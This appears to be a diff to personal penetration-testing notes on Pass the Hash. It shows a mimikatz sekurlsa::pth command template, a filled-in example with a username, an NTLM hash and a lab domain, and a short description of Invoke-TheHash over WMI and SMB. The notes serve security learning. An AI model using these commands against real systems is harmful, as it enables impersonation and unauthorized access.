amandaguglieri/hackinglife/docs/pass-the-hash.md

 # 1. Run mimikatz
 mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>" exit
 # sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password
+# /user: the user we want to impersonate
+# /rc4:<NTLM hash>: /rc4 or /NTLM - NTLM hash of the user's password.
 # /run:<Command>: For example /run:cmd.exe

-# 2. After that, we canuse cmd.exe to execute commands in the user's context.
+# 2. After that, we can use cmd.exe to execute commands in the user's context.

+# Example:
+# .\mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

 ```

 ## Pass the Hash with PowerShell Invoke-TheHash (Windows)

 [See Powershell Invoke-TheHash](invoke-the-hash.md).
 This tool is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB.
 WMI and SMB connections are accessed through the .NET TCPClient.
 Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.

 Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

 When using Invoke-TheHash, we have two options: SMB or WMI command execution.